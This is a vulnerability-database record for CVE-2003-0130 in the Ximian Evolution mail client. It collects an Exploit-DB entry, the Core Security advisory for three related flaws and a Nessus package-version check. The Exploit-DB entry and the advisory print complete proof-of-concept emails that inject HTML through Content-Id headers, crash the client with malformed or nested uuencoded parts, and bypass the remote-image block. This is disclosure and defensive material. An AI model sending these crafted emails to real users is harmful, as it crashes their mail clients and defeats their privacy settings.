ID CVE-2003-0130 Type cve Reporter cve@mitre.org Modified 2017-10-11T01:29:00
Description
The handle_image function in mail-format.c for Ximian Evolution Mail User Agent 1.2.2 and earlier does not properly escape HTML characters, which allows remote attackers to inject arbitrary data and HTML via a MIME Content-ID header in a MIME-encoded image.
{"exploitdb": [{"lastseen": "2016-02-02T18:36:02", "description": "Ximian Evolution 1.x MIME image/* Content-Type Data Inclusion Vulnerability. CVE-2003-0130. Remote exploit for linux platform", "published": "2003-03-19T00:00:00", "type": "exploitdb", "title": "Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0130"], "modified": "2003-03-19T00:00:00", "id": "EDB-ID:22371", "href": "https://www.exploit-db.com/exploits/22371/", "sourceData": "source: http://www.securityfocus.com/bid/7119/info\r\n\r\nXimian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types.\r\n\r\nThe following example will cause heap corruption:\r\n\r\n>From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary=\"=-mTDu5zdJIsixETTwCF5Y\"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: 7bit\r\nContent-Id: hello\r\n\r\nHello World!\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name1.gif\r\nContent-Type: image/gif; name=name1.gif\r\nContent-Id: \"><OBJECT classid=\"cid:hello\" type=\"text/plain\"></OBJECT><hr \"\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name2.gif\r\nContent-Type: image/gif; name=name2.gif\r\nContent-Id: \"><OBJECT classid=\"cid:hello\" type=\"text/plain\"></OBJECT><hr \"\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\n\r\nThe following example will bypass the \"Don't connect to remote hosts to fetch images\" option:\r\n\r\n>From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary=\"=-mTDu5zdJIsixETTwCF5Y\"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Type: text/html\r\nContent-Transfer-Encoding: 7bit\r\nContent-Id: apart\r\n\r\n<img src=\"http://external.host.com:anyport\">\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name2.gif\r\nContent-Type: image/gif; name=name2.gif\r\nContent-Id: \"><OBJECT classid=\"cid:apart\" type=\"text/html\"></OBJECT><hr \"\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\n\r\nThe following example will cause Evolution to invoke the bonobo-audio-ulaw component:\r\n\r\n>From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary=\"=-mTDu5zdJIsixETTwCF5Y\"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Type: audio/ulaw\r\nContent-Transfer-Encoding: 7bit\r\nContent-Id: mysong\r\n\r\nThere she was, just walking down the street...\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name2.gif\r\nContent-Type: image/gif; name=name2.gif\r\nContent-Id: \"><OBJECT classid=\"cid:mysong\" type=\"audio/ulaw\"></OBJECT><hr \"\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22371/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2003-0130"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 13490](https://vulners.com/osvdb/OSVDB:13490)\nRedHat RHSA: RHSA-2003:108\nOVAL ID: 111\nMail List Post: http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0141.html\nISS X-Force ID: 11579\n[CVE-2003-0130](https://vulners.com/cve/CVE-2003-0130)\nBugtraq ID: 7119\n", "modified": "2003-03-19T00:00:00", "published": "2003-03-19T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:13491", "id": "OSVDB:13491", "title": "Ximian Evolution Mail User Agent handle_image Function Arbitrary Data Injection", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0130", "CVE-2003-0128", "CVE-2003-0129"], "description": " \r\n Core Security Technologies Advisory\r\n http://www.coresecurity.com\r\n\r\n Multiple vulnerabilities in Ximian's Evolution Mail User Agent\r\n\r\n\r\nDate Published: 2003-03-19\r\n\r\nLast Update: 2003-03-19\r\n\r\nAdvisory ID: CORE-20030304-01\r\n\r\nBugtraq IDs: 7117, 7118, 7119\r\n\r\nCVE CAN: CAN-2003-0128 CAN-2003-0129 CAN-2003-0130\r\n\r\nTitle: Multiple vulnerabilities in Ximian's Evolution Mail User Agent\r\n\r\nClass: Input validation error;\r\n Failure to handle exceptional conditions;\r\n Information Gathering\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nAdvisory URL:\r\n http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10\r\n\r\nVendors contacted:\r\n\r\n- Ximian\r\n . CORE notification: 2003-03-11\r\n . Notification acknowledged by Ximian: 2003-03-11\r\n . Fixes added by Ximian to CVS tree: 2003-03-12\r\n . BID, CVE numbers assigned: 2003-03-18\r\n . Roll out of fixes: 2003-03-19\r\n . Advisory published: 2003-03-19\r\n\r\nRelease Mode: COORDINATED RELEASE\r\n\r\n*Vulnerability Description:*\r\n\r\n Ximian Evolution is a personal and workgroup information management\r\n solution for Linux and UNIX-based systems. The software integrates\r\n email, calendaring, meeting scheduling, contact management, and task\r\n lists, in one application. For more information about Ximian\r\n Evolution visit http://www.ximian.com\r\n \r\n Three vulnerabilities were found that could lead to various forms of\r\n exploitation ranging from denying to users the ability to read email,\r\n provoke system unstability, bypassing security context checks for\r\n email content and possibly execution of arbitrary commands on\r\n vulnerable systems.\r\n \r\n The following security vulnerabilities were found:\r\n\r\n [CAN-2003-0128, BID 7117]\r\n\r\n The Evolution mailer accepts UUEncoded content and will\r\n transparently decode it. By including a specially crafted UUE header\r\n as part of an otherwise perfectly normal email an attacker has the\r\n ability to crash Evolution as soon as the mail is parsed. This makes\r\n it particularly difficult to delete this email from Evolution's GUI\r\n and prevents a user from reading email until the malicious mail is\r\n removed from the mailbox.\r\n\r\n All versions of Evolution that include the function\r\n try_uudecoding in the module mail/mail-format.c are vulnerable.\r\n\r\n [CAN-2003-0129, BID 7118]\r\n\r\n Having the Evolution mailer process mail content UUencoded multiple\r\n times will cause resource starvation. The MUA will try to allocate\r\n memory until it dies, possibly leading to system unstability.\r\n Our example in the technical details section uses email content\r\n encoded 3 times.\r\n\r\n [CAN-2003-0130, BID 7119]\r\n\r\n By including a specially crafted MIME Content-ID header as part of\r\n an image/* MIME part, it is possible to include arbitrary data,\r\n including HTML tags, into the stream that is passed to GTKHtml for\r\n rendering.\r\n\r\n These vulknerabilities provides multiple exploitation possibilities\r\n in the Evolution mailer. Namely, it's possible:\r\n\r\n a) To crash the application. The crash appears to be the result\r\n of heap corruption, further research on this bug is required\r\n to demostrate sucessfull exploitation to run arbitrary commands\r\n on vulnerable systems.\r\n\r\n b) To bypass the "Don't connect to remote hosts to fetch images"\r\n option.\r\n\r\n c) To execute some bonobo components and pass them arbitrary content,\r\n included as part of the mail.\r\n\r\n*Vulnerable Packages:*\r\n\r\n Evolution 1.2.2 and prior releases are vulnerable, partially or\r\n wholly to the vulnerabilities in this advisory.\r\n\r\n*Solution/Vendor Information/Workaround:*\r\n\r\n Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This\r\n release resolves all vulnerabilities in this advisory as well as\r\n other unrelated bugs. The patched code for Evolution that resolves\r\n these vulnerabilities is also already available in GNOME CVS.\r\n\r\n A workaround for unpatched versions of Evolution to prevent Evolution\r\n from crashing when viewing messages that exploit these\r\n vulnerabilities is to go into "View"->"Message Display" and change\r\n the value to "Show E-mail Source."\r\n\r\n Distribution vendors who provide their own version of Evolution have\r\n been advised of these issues as well as having been provided the\r\n patches to fix them. They may provide updated packages for their\r\n distributions.\r\n\r\n\r\n*Credits:*\r\n\r\n These vulnerabilities were found by Diego Kelyacoubian, Javier Kohen,\r\n Alberto Solino, and Juan Vera from Core Security Technologies during\r\n Bugweek 2003 (March 3-7, 2003).\r\n\r\n We would like to thank Carlos Montero Luque at Ximian for quickly\r\n addressing our report and coordinating the generation and\r\n public release of patches and information regarding these\r\n vulnerabilities.\r\n \r\n Thanks also to Jeffrey Stedfast and other members of the Evolution\r\n development team for the followup and development of the patches to\r\n close these vulnerabilities.\r\n\r\n*Technical Description - Exploit/Concept Code:*\r\n\r\n [CAN-2003-0128, BID 7117]\r\n\r\n The following email will reproduce this vulnerability, note that\r\n an empty line is required before and after the UUE header line.\r\n\r\n >From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: inline; filename=name\r\nContent-Type: application/octet-stream; name=name\r\nContent-Transfer-Encoding: 7bit\r\n\r\nbegin 600\r\n \r\nend\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y--\r\n\r\n\r\n [CAN-2003-0129, BID 7118]\r\n\r\n The following email will reproduce this vulnerability.\r\n\r\n >From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=3D-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: inline; filename=3Dname\r\nContent-Type: application/octet-stream; name=3Dname\r\nContent-Transfer-Encoding: 7bit\r\n\r\nbegin 600 phase2\r\nM8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310\r\nM6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C\r\nM138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\\r\nM7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC\r\nM(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T\r\nM-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-\r\n?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@ \r\n \r\nend\r\n\r\n--=3D-mTDu5zdJIsixETTwCF5Y--\r\n\r\n [CAN-2003-0130, BID 7119]\r\n\r\n The handle_image() function, located in the module\r\n mail/mail-format.c, lacks proper input checking. This function does\r\n not escape HTML characters in the string returned by get_cid, which\r\n is in turn constructed from the Content-ID MIME header included in\r\n the MIME part.\r\n\r\n It can be exploited several ways, for instance:\r\n\r\n a) The Evolution mailer will crash when a MIME part's Content-ID is\r\n referenced from two different object tags via the cid "protocol".\r\n The following email will reproduce this vulnerability in Evolution\r\n version 1.2.1:\r\n\r\n >From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: 7bit\r\nContent-Id: hello\r\n\r\nHello World!\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name1.gif\r\nContent-Type: image/gif; name=name1.gif\r\nContent-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name2.gif\r\nContent-Type: image/gif; name=name2.gif\r\nContent-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\n\r\n b) The following email bypasses the "Don't connect to remote hosts\r\n to fetch images" option.\r\n\r\n >From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Type: text/html\r\nContent-Transfer-Encoding: 7bit\r\nContent-Id: apart\r\n\r\n<img src="http://external.host.com:anyport">\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name2.gif\r\nContent-Type: image/gif; name=name2.gif\r\nContent-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\n\r\n c) It is possible to execute bonobo components to handle content\r\n types that Evolution mailer does not handle internally (for example\r\n audio/ulaw). The following mail uses the Content-ID bug to execute\r\n the bonobo-audio-ulaw component (bundled by default with bonobo)\r\n and pass it arbitrary content.\r\n\r\n >From xxx@corest.com Wed Mar 5 14:06:02 2003\r\nSubject: xxx\r\nFrom: X X. X <xxx@corest.com>\r\nTo: xxx@corest.com\r\nContent-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"\r\nMessage-Id: <1046884154.1731.5.camel@vaiolin>\r\nMime-Version: 1.0\r\nDate: 05 Mar 2003 14:09:14 -0300\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Type: audio/ulaw\r\nContent-Transfer-Encoding: 7bit\r\nContent-Id: mysong\r\n\r\nThere she was, just walking down the street...\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\nContent-Disposition: attachment; filename=name2.gif\r\nContent-Type: image/gif; name=name2.gif\r\nContent-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "\r\nContent-Transfer-Encoding: base64\r\n\r\n--=-mTDu5zdJIsixETTwCF5Y\r\n\r\n\r\n*About Core Security Technologies*\r\n \r\n Core Security Technologies develops strategic security solutions for\r\n Fortune 1000 corporations, government agencies and military\r\n organizations. The company offers information security software and\r\n services designed to assess risk and protect and manage information assets.\r\n Headquartered in Boston, MA, Core Security Technologies can be reached at\r\n 617-399-6980 or on the Web at http://www.coresecurity.com.\r\n\r\n To learn more about CORE IMPACT, the first comprehensive penetration\r\n testing framework, visit http://www.coresecurity.com/products/coreimpact\r\n\r\n*DISCLAIMER:*\r\n\r\n The contents of this advisory are copyright (c) 2003 CORE Security\r\n Technologies and may be distributed freely provided that no fee is\r\n charged for this distribution and proper credit is given.\r\n\r\n$Id: Ximian-Evolution-advisory.txt,v 1.2 2003/03/19 23:05:30 iarce Exp $\r\n\r\n\r\n", "edition": 1, "modified": "2003-03-20T00:00:00", "published": "2003-03-20T00:00:00", "id": "SECURITYVULNS:DOC:4246", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4246", "title": "CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T11:51:18", "description": "Several vulnerabilities were discovered in the Evolution email client.\nThese problems make it possible for a carefully constructed email\nmessage to crash the program, causing general system instability by\nstarving resources.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : evolution (MDKSA-2003:045)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0130", "CVE-2003-0128", "CVE-2003-0129"], "modified": "2004-07-31T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:evolution-pilot", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "p-cpe:/a:mandriva:linux:libevolution0-devel", "p-cpe:/a:mandriva:linux:libevolution0", "p-cpe:/a:mandriva:linux:evolution"], "id": "MANDRAKE_MDKSA-2003-045.NASL", "href": "https://www.tenable.com/plugins/nessus/14029", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:045. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14029);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0128\", \"CVE-2003-0129\", \"CVE-2003-0130\");\n script_xref(name:\"MDKSA\", value:\"2003:045\");\n\n script_name(english:\"Mandrake Linux Security Advisory : evolution (MDKSA-2003:045)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in the Evolution email client.\nThese problems make it possible for a carefully constructed email\nmessage to crash the program, causing general system instability by\nstarving resources.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:evolution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:evolution-pilot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libevolution0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libevolution0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"evolution-1.0.8-3.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"evolution-pilot-1.0.8-3.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libevolution0-1.0.8-3.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libevolution0-devel-1.0.8-3.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"evolution-1.2.4-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"evolution-pilot-1.2.4-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libevolution0-1.2.4-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libevolution0-devel-1.2.4-1.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
